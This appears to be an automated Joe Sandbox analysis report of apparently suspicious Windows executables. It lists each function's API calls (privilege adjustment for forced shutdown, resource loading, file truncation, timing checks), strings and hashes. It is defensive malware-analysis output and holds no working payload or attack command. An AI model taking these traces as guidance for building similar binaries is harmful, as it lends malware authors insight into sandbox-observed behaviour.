Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: e9d4eabf3352258034a438adb9f93a7799ac96b59790047b66948ab7235a5e89
Instruction ID: 0172511661962fd54a17c381567595eb1d39a1afdb2a9088c563811225ee2893
Opcode Fuzzy Hash: e9d4eabf3352258034a438adb9f93a7799ac96b59790047b66948ab7235a5e89
Instruction Fuzzy Hash: FDD05E81B00A6017D215E2BE498864696C85F88745B08847AFA84E73D1D67CAC008399

Function 00407DA4 Relevance: 1.3, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,00407E82), ref: 00407DBB

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 5b9bfc86dfec920811477731d59a81a0154f8da7388717baf7e2e0d063c75e3e
Instruction ID: 99ab645fda39969175de1cb99313e8e2edaeef7f3c7532f72142fb74a6686f70
Opcode Fuzzy Hash: 5b9bfc86dfec920811477731d59a81a0154f8da7388717baf7e2e0d063c75e3e
Instruction Fuzzy Hash: 0AD0E9B17553055BDB90EEB95CC5B123BD87B48601F5044B66904EB29AE674E8109614

Non-executed Functions

Function 0040936C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028), ref: 0040937B
OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00409381
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 0040939A
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004093C1
GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004093C6
ExitWindowsEx.USER32(00000002,00000000), ref: 004093D7

Strings

SeShutdownPrivilege, xrefs: 00409393

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID: SeShutdownPrivilege
API String ID: 107509674-3733053543
Opcode ID: 2b7c2d1c4f590a8974f253569f8503172d2d606641626e35aa9b2bf4c08caf06
Instruction ID: 611fb1cec5075bd7f6e538fe0f9c98e62950726bb4ce6d0bef13c3fa82a74cfd
Opcode Fuzzy Hash: 2b7c2d1c4f590a8974f253569f8503172d2d606641626e35aa9b2bf4c08caf06
Instruction Fuzzy Hash: 95F0627068430276E610A6718C47F67228C5B88B08F50483ABE51FA1C3D7BCCC044A6F

Function 00409AD0 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409ADA
SizeofResource.KERNEL32(00000000,00000000,?,00409BC5,00000000,0040A15C,?,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 00409AED
LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409BC5,00000000,0040A15C,?,00000001,00000000,00000002,00000000,0040A1A4,?,00000000), ref: 00409AFF
LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409BC5,00000000,0040A15C,?,00000001,00000000,00000002,00000000,0040A1A4), ref: 00409B10

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 400a5822642c04a340576dade1617737d9942a0be047b9803f81a1d9eeffe18d
Instruction ID: bd400d834a0aeaf6767d0a45abc69bca8fb82328816d2df24890c915d48f9c17
Opcode Fuzzy Hash: 400a5822642c04a340576dade1617737d9942a0be047b9803f81a1d9eeffe18d
Instruction Fuzzy Hash: 87E05AD035434625EA6036E718D2B2B62085FA471DF00013FBB00792D3DDBC8C04452E

Function 004051A8 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004053AA,?,?,?,00000000,0040555C), ref: 004051BB

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 5ea09b3054f78be8d61aadd1ef4a431fb4c5ee7ddbf8397ee2588b1f4940bcb7
Instruction ID: dec8dcb9893e8432c944e1b70884c8cc40709e939aac0c2d0d2241257bb7fc31
Opcode Fuzzy Hash: 5ea09b3054f78be8d61aadd1ef4a431fb4c5ee7ddbf8397ee2588b1f4940bcb7
Instruction Fuzzy Hash: D3D05EB631E6502AE210519B2D85EBB4EACCAC57A4F14443BF648DB242D2248C069776

Function 00405C44 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,00406540,00000000,0040654E,?,?,?,?,?,00409B44), ref: 00405C52

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: b3c8fce3f516c1eeee7654ac00498b0e6f5204205adccd6d1250d5bfc2945711
Instruction ID: 6a84e84a5bdb2c7c5b206d002f2a3fc227ad50a79849cf1aa773f1ea3c1cbc6a
Opcode Fuzzy Hash: b3c8fce3f516c1eeee7654ac00498b0e6f5204205adccd6d1250d5bfc2945711
Instruction Fuzzy Hash: 5AC0126040470186E7109B319C42B1672D4A744310F4805396DA4953C2E73C81018A5A

Function 00406F84 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 86registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407089), ref: 00406FAD
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00406FB3
RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407089), ref: 00407001

Strings

kernel32.dll, xrefs: 00406FA8
Locale, xrefs: 00406FF0
.DEFAULT\Control Panel\International, xrefs: 00406FD8
Control Panel\Desktop\ResourceLocale, xrefs: 00407010
GetUserDefaultUILanguage, xrefs: 00406FA3

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: AddressCloseHandleModuleProc
String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
API String ID: 4190037839-2401316094
Opcode ID: 60a9e4a616bde9d3650d5374f7b0e792bef98a6345d6610fa7bc99ac1ec5f133
Instruction ID: 4848c3cc747176469ce0ef08a48ea257d9f62360c4c8e5a9f2e1a14c28c6fa3b
Opcode Fuzzy Hash: 60a9e4a616bde9d3650d5374f7b0e792bef98a6345d6610fa7bc99ac1ec5f133
Instruction Fuzzy Hash: C3217370E04209ABDB10EBB5CD51B9F77A8EB44304F60857BA500F72C1DB7CAA05879E

Function 00403A97 Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
GetLastError.KERNEL32(000000F5), ref: 00403C1E

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
String ID:
API String ID: 1694776339-0
Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D

Function 00405314 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON

Download Yara Rule

APIs

GetSystemDefaultLCID.KERNEL32(00000000,0040555C,?,?,?,?,00000000,00000000,00000000,?,0040653B,00000000,0040654E), ref: 0040532E

Part of subcall function 0040515C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,00405227,?,00000000,00405306), ref: 0040517A

Part of subcall function 004051A8: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004053AA,?,?,?,00000000,0040555C), ref: 004051BB

Strings

m/d/yy, xrefs: 004053FD
mmmm d, yyyy, xrefs: 0040541F
AMPM, xrefs: 004054F9
:mm:ss, xrefs: 0040552A
:mm, xrefs: 00405510

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: InfoLocale$DefaultSystem
String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
API String ID: 1044490935-665933166
Opcode ID: 161572950381ad7cbc257d6fe5eb76d638651fb1e2415ab537dea70fc89fa197
Instruction ID: f22f4b18e1885e1925b87b286fa486de3d96a381b4aec2b7527aff107c54c5fa
Opcode Fuzzy Hash: 161572950381ad7cbc257d6fe5eb76d638651fb1e2415ab537dea70fc89fa197
Instruction Fuzzy Hash: 8E514234B00648ABDB00EBA59C91B9F776ADB89304F50957BB514BB3C6CA3DCA058B5C

Function 004019DC Relevance: 9.1, APIs: 6, Instructions: 59COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
LocalFree.KERNEL32(0054E588,00000000,00401AB4), ref: 00401A1B
VirtualFree.KERNEL32(?,00000000,00008000,0054E588,00000000,00401AB4), ref: 00401A3A
LocalFree.KERNEL32(0054F588,?,00000000,00008000,0054E588,00000000,00401AB4), ref: 00401A79
RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID:
API String ID: 3782394904-0
Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D

Function 00403D02 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72windowCOMMON

Download Yara Rule

APIs

MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
ExitProcess.KERNEL32 ref: 00403DE5

Strings

9@, xrefs: 00403D29, 00403D34
Runtime error at 00000000, xrefs: 00403D96, 00403DA9
Error, xrefs: 00403D91

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: ExitMessageProcess
String ID: Error$Runtime error at 00000000$9@
API String ID: 1220098344-1503883590
Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E

Function 004036B8 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString
String ID:
API String ID: 262959230-0
Opcode ID: e5c78b39f57021be2b84baee447ab27339ef0409ceaef8bd5dd3a85dcd2f6a98
Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
Opcode Fuzzy Hash: e5c78b39f57021be2b84baee447ab27339ef0409ceaef8bd5dd3a85dcd2f6a98
Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD

Function 00401918 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D

Function 004030DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00409B3A), ref: 004030E3
GetCommandLineA.KERNEL32(00000000,00409B3A), ref: 004030EE

Strings

U1hd.@, xrefs: 00403103

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: CommandHandleLineModule
String ID: U1hd.@
API String ID: 2123368496-2904493091
Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD

Function 004093FC Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A0FF,000000FA,00000032,0040A166), ref: 0040941B
Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A0FF,000000FA,00000032,0040A166), ref: 0040942B
GetLastError.KERNEL32(?,?,?,0000000D,?,0040A0FF,000000FA,00000032,0040A166), ref: 0040943E
GetLastError.KERNEL32(?,?,?,0000000D,?,0040A0FF,000000FA,00000032,0040A166), ref: 00409448

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: ErrorLastSleep
String ID:
API String ID: 1458359878-0
Opcode ID: fb2155ff6e4859bec8591c3fde2b363a3ebb44483e144ae34e4cc697df15f474
Instruction ID: 2c3041558bff2c9731999a3fdaa5bf7f611e1c5313eca5e15d372d414c244bd5
Opcode Fuzzy Hash: fb2155ff6e4859bec8591c3fde2b363a3ebb44483e144ae34e4cc697df15f474
Instruction Fuzzy Hash: 32F0B472A0811457CB34B5EF9981A6F638DEAD1368751813BF904F3383D578CD0392AD

Analysis Process: Lbg6Jgx2PuK0JimgGIFCI5UU.exePID: 6256, Parent PID: 5720COMMON

Execution Graph

Execution Coverage:	0.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5.5%
Total number of Nodes:	110
Total number of Limit Nodes:	12

Executed Functions

Function 665D35A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6665F688,00001000), ref: 665D35D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 665D35E0
QueryPerformanceFrequency.KERNEL32(?), ref: 665D35FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 665D363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 665D369F
__aulldiv.LIBCMT ref: 665D36E4
QueryPerformanceCounter.KERNEL32(?), ref: 665D3773
EnterCriticalSection.KERNEL32(6665F688), ref: 665D377E
LeaveCriticalSection.KERNEL32(6665F688), ref: 665D37BD
QueryPerformanceCounter.KERNEL32(?), ref: 665D37C4
EnterCriticalSection.KERNEL32(6665F688), ref: 665D37CB
LeaveCriticalSection.KERNEL32(6665F688), ref: 665D3801
__aulldiv.LIBCMT ref: 665D3883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 665D3902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 665D3918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 665D394C

Strings

GTC, xrefs: 665D3912
GenuntelineI, xrefs: 665D3639
AuthcAMDenti, xrefs: 665D3946
MOZ_TIMESTAMP_MODE, xrefs: 665D35DB
QPC, xrefs: 665D38FC

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 685cca1065e4b6547eeb434abb9032eb17d2e9b62d5205de9d18e79f509f73ea
Instruction ID: fc2a7eb33de54776d8b13f144c6e72c8b1367355e8fefe86a72aebcb501f6bd5
Opcode Fuzzy Hash: 685cca1065e4b6547eeb434abb9032eb17d2e9b62d5205de9d18e79f509f73ea
Instruction Fuzzy Hash: 83B1A571A053609FDB08DF2EE85661ABBE7ABCA700F05892DE599D7390D7709D00CF85

Function 665EC930 Relevance: 7.6, APIs: 5, Instructions: 83
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?), ref: 665EC947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 665EC969
GetSystemInfo.KERNEL32(?), ref: 665EC9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 665EC9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 665EC9E2

Memory Dump Source

Source File: 00000009.00000002.2718249908.00000000665D1000.00000020.00000001.01000000.00000023.sdmp, Offset: 665D0000, based on PE: true

Associated: 00000009.00000002.2717940466.00000000665D0000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718939776.000000006664D000.00000002.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2718982563.000000006665E000.00000004.00000001.01000000.00000023.sdmpDownload File
Associated: 00000009.00000002.2719016597.0000000066662000.00000002.00000001.01000000.00000023.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_665d0000_Lbg6Jgx2PuK0JimgGIFCI5UU.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 057920dcf76ef6ab2be1db5b68d08a85a57e05accae86231265ec5d8304d741c
Instruction ID: 77cbb5142d808ffff2119fdb74a30251d52c6706a5efad974dfa327ccbe638bf
Opcode Fuzzy Hash: 057920dcf76ef6ab2be1db5b68d08a85a57e05accae86231265ec5d8304d741c
Instruction Fuzzy Hash: 4821FF726402285BDF04DF25EC86B6E7B6BABC6744F500519FA12E7340EB70AC00CB95

Function 665D3060 Relevance: 4.5, APIs: 3, Instructions: 36
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 665D3095

Part of subcall function 665D35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6665F688,00001000), ref: 665D35D5
Part of subcall function 665D35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 665D35E0
